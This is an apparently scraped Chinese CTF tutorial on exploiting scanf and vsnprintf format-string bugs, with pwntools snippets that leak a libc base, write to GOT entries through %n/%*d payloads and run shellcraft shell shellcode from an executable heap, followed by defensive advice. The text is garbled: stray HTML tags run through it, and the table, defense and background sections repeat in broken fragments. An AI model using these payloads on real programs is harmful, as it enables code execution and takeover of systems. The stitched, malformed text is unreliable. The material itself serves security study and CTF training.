非常见类型的格式化字符串漏洞利用技术详解<\/h1>

1. scanf格式化字符串漏洞利用<\/h2>

1.1 漏洞背景<\/h3>
在传统的格式化字符串漏洞利用中，我们通常关注的是`printf<\/code>系列函数。然而，scanf<\/code>函数同样存在格式化字符串漏洞，只是相关研究和利用资料较少。<\/p>`

1.2 题目分析<\/h3>
题目特点：<\/p>

使用read<\/code>读入的数据作为scanf<\/code>的第一个参数（格式化字符串）<\/li>
rsi<\/code>寄存器也指向输入缓冲区（但实际利用中可能不需要）<\/li>
程序开启了FULL RELRO保护，因此需要攻击libc的GOT表<\/li>
<\/ul>
1.3 利用原理<\/h3>
scanf<\/code>函数中的%n<\/code>格式化符号与printf<\/code>类似，但作用不同：<\/p>

scanf<\/code>的%n<\/code>将成功读入的字符串数量<\/strong>写入对应的指针所指向的地址<\/li>
可以类比printf<\/code>的%n<\/code>，但写入的值是输入的长度而非输出的长度<\/li>
<\/ul>
1.4 利用步骤<\/h3>


泄漏libc基址<\/strong>：<\/p>
p.<\/span>recvuntil("Welcome to xyctf, this is a gift: "<\/span>)
<\/span><\/span>libcbase =<\/span> int(p.<\/span>recv(14<\/span>), 16<\/span>) -<\/span> libc.<\/span>sym['printf'<\/span>]
<\/span><\/span><\/code><\/pre><\/li>

构造payload<\/strong>：<\/p>
libcgot =<\/span> libcbase +<\/span> 0x1EC040<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'<\/span>%*s<\/span>%8$lln'<\/span>  # %*s用于控制输入长度，避免栈溢出<\/span>
<\/span><\/span>payload =<\/span> payload.<\/span>ljust(0x10<\/span>, b<\/span>'a'<\/span>) +<\/span> p64(libcgot)
<\/span><\/span><\/code><\/pre><\/li>

触发漏洞<\/strong>：<\/p>
p.<\/span>send(payload)
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span> *<\/span> backdoor
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.5 关键点说明<\/h3>

%*s<\/code>：用于控制输入长度，避免栈溢出<\/li>
%8$lln<\/code>：将成功读入的字符数写入第8个参数指向的地址<\/li>
需要将目标地址（libc GOT表地址）放在格式化字符串后的特定位置<\/li>
<\/ul>
2. vsnprintf格式化字符串漏洞利用<\/h2>
2.1 漏洞背景<\/h3>
vsnprintf<\/code>是printf<\/code>家族函数之一，它将格式化输出写入缓冲区而非直接输出到标准输出。这使得传统的泄漏技术（如泄漏栈地址或堆地址）变得困难。<\/p>
2.2 题目特点<\/h3>

程序通过mprotect<\/code>使堆内存可执行<\/li>
display_current_time<\/code>函数中存在格式化字符串漏洞<\/li>
GOT表可写<\/li>
格式化字符串后有一个puts<\/code>函数调用<\/li>
<\/ul>
2.3 利用思路<\/h3>

劫持puts<\/code>的GOT表项，将其指向堆上的shellcode<\/li>
利用%*d<\/code>格式化字符串技巧控制写入的值<\/li>
<\/ol>
2.4 利用步骤<\/h3>


初始化阶段<\/strong>：<\/p>
p.<\/span>recvuntil(b<\/span>"plz input mprotect code"<\/span>)
<\/span><\/span>p.<\/span>sendline(b<\/span>"a"<\/span>)  # 触发mprotect使堆可执行<\/span>
<\/span><\/span><\/code><\/pre><\/li>

第一次格式化字符串攻击<\/strong>：<\/p>
payload1 =<\/span> b<\/span>"<\/span>%4210688x<\/span>%33$ln"<\/span>  # 将特定值写入目标地址<\/span>
<\/span><\/span>p.<\/span>sendline(payload1)
<\/span><\/span><\/code><\/pre><\/li>

第二次格式化字符串攻击<\/strong>：<\/p>
payload2 =<\/span> b<\/span>"<\/span>%*d<\/span>%63$ln"<\/span>  # 关键技巧<\/span>
<\/span><\/span>p.<\/span>sendline(payload2)
<\/span><\/span><\/code><\/pre><\/li>

写入shellcode<\/strong>：<\/p>
shellcode =<\/span> asm(shellcraft.<\/span>sh())
<\/span><\/span>p.<\/span>sendline(shellcode)  # 将shellcode写入堆<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.5 关键技术点<\/h3>


%*d<\/code>格式化字符串技巧<\/strong>：<\/p>

%*d<\/code>会从参数中读取一个值作为宽度参数<\/li>
可以控制这个宽度值来精确控制写入的值<\/li>
例如：printf("%*d%63$ln", name, pwd)<\/code>，其中name<\/code>的值被用作宽度<\/li>
<\/ul>
<\/li>

堆地址控制<\/strong>：<\/p>

由于堆可执行，可以将控制流劫持到堆上的shellcode<\/li>
需要精确计算堆地址与写入值的关系<\/li>
<\/ul>
<\/li>

GOT表劫持<\/strong>：<\/p>

劫持puts<\/code>的GOT表项，使其指向堆上的shellcode<\/li>
当后续调用puts<\/code>时，实际执行的是shellcode<\/li>
<\/ul>
<\/li>
<\/ol>
3. 总结与对比<\/h2>



特性<\/th>
scanf格式化字符串<\/th>
vsnprintf格式化字符串<\/th>
<\/tr>
<\/thead>


主要函数<\/td>
scanf<\/td>
vsnprintf<\/td>
<\/tr>

关键格式化符号<\/td>
%n<\/td>
%n, %*d<\/td>
<\/tr>

写入值来源<\/td>
成功读入的字符数<\/td>
格式化输出长度或参数值<\/td>
<\/tr>

典型利用目标<\/td>
libc GOT表<\/td>
程序GOT表<\/td>
<\/tr>

特殊技巧<\/td>
%*s控制输入长度<\/td>
%*d控制宽度参数<\/td>
<\/tr>

内存保护<\/td>
通常需要绕过RELRO<\/td>
可能需要可执行内存区域<\/td>
<\/tr>
<\/tbody>
<\/table>
4. 防御建议<\/h2>


输入验证<\/strong>：<\/p>

对所有用户提供的格式化字符串进行严格验证<\/li>
禁止用户控制格式化字符串<\/li>
<\/ul>
<\/li>

安全编译选项<\/strong>：<\/p>

启用FULL RELRO保护<\/li>
启用栈保护机制<\/li>
<\/ul>
<\/li>

代码审计<\/strong>：<\/p>

检查所有格式化字符串函数的使用<\/li>
确保没有用户可控的格式化字符串<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制内存可执行权限<\/li>
使用地址空间随机化(ASLR)<\/li>
<\/ul>
<\/li>
<\/ol>
5. 扩展思考<\/h2>


其他非常见格式化函数<\/strong>：<\/p>

syslog<\/code>系列函数中的格式化字符串漏洞<\/li>
err<\/code>\/warn<\/code>系列函数中的格式化字符串<\/li>
<\/ul>
<\/li>

组合利用技术<\/strong>：<\/p>

格式化字符串与堆漏洞的结合利用<\/li>
格式化字符串与信息泄漏的结合<\/li>
<\/ul>
<\/li>

新型防护技术<\/strong>：<\/p>

格式化字符串防护编译器扩展<\/li>
运行时格式化字符串检测机制<\/li>
<\/ul>
<\/li>
<\/ol>
通过深入理解这些非常见类型的格式化字符串漏洞，安全研究人员可以更全面地评估软件安全性，开发人员可以编写更健壮的代码，防御此类安全威胁。<\/p>

特性<\/th>	scanf格式化字符串<\/th>	vsnprintf格式化字符串<\/th> <\/tr> <\/thead>
主要函数<\/td>	scanf<\/td>	vsnprintf<\/td> <\/tr>
关键格式化符号<\/td>	%n<\/td>	%n, %*d<\/td> <\/tr>
写入值来源<\/td>	成功读入的字符数<\/td>	格式化输出长度或参数值<\/td> <\/tr>
典型利用目标<\/td>	libc GOT表<\/td>	程序GOT表<\/td> <\/tr>
特殊技巧<\/td>	%*s控制输入长度<\/td>	%*d控制宽度参数<\/td> <\/tr>
内存保护<\/td>	通常需要绕过RELRO<\/td>	可能需要可执行内存区域<\/td> <\/tr> <\/tbody> <\/table> 4. 防御建议<\/h2> 输入验证<\/strong>：<\/p> 对所有用户提供的格式化字符串进行严格验证<\/li> 禁止用户控制格式化字符串<\/li> <\/ul> <\/li> 安全编译选项<\/strong>：<\/p> 启用FULL RELRO保护<\/li> 启用栈保护机制<\/li> <\/ul> <\/li> 代码审计<\/strong>：<\/p> 检查所有格式化字符串函数的使用<\/li> 确保没有用户可控的格式化字符串<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 限制内存可执行权限<\/li> 使用地址空间随机化(ASLR)<\/li> <\/ul> <\/li> <\/ol> 5. 扩展思考<\/h2> 其他非常见格式化函数<\/strong>：<\/p> `syslog<\/code>系列函数中的格式化字符串漏洞<\/li>` `err<\/code>\/warn<\/code>系列函数中的格式化字符串<\/li> <\/ul> <\/li>` 组合利用技术<\/strong>：<\/p> 格式化字符串与堆漏洞的结合利用<\/li> 格式化字符串与信息泄漏的结合<\/li> <\/ul> <\/li> 新型防护技术<\/strong>：<\/p> 格式化字符串防护编译器扩展<\/li> 运行时格式化字符串检测机制<\/li> <\/ul> <\/li> <\/ol> 通过深入理解这些非常见类型的格式化字符串漏洞，安全研究人员可以更全面地评估软件安全性，开发人员可以编写更健壮的代码，防御此类安全威胁。<\/p>

非常见类型的格式化字符串漏洞利用技术详解<\/h1>

1. scanf格式化字符串漏洞利用<\/h2>

1.1 漏洞背景<\/h3> 在传统的格式化字符串漏洞利用中，我们通常关注的是printf<\/code>系列函数。然而，scanf<\/code>函数同样存在格式化字符串漏洞，只是相关研究和利用资料较少。<\/p>

2. vsnprintf格式化字符串漏洞利用<\/h2>

2.1 漏洞背景<\/h3> vsnprintf<\/code>是printf<\/code>家族函数之一，它将格式化输出写入缓冲区而非直接输出到标准输出。这使得传统的泄漏技术（如泄漏栈地址或堆地址）变得困难。<\/p>

1.1 漏洞背景<\/h3>
在传统的格式化字符串漏洞利用中，我们通常关注的是`printf<\/code>系列函数。然而，scanf<\/code>函数同样存在格式化字符串漏洞，只是相关研究和利用资料较少。<\/p>`

2.1 漏洞背景<\/h3>
`vsnprintf<\/code>是printf<\/code>家族函数之一，它将格式化输出写入缓冲区而非直接输出到标准输出。这使得传统的泄漏技术（如泄漏栈地址或堆地址）变得困难。<\/p>`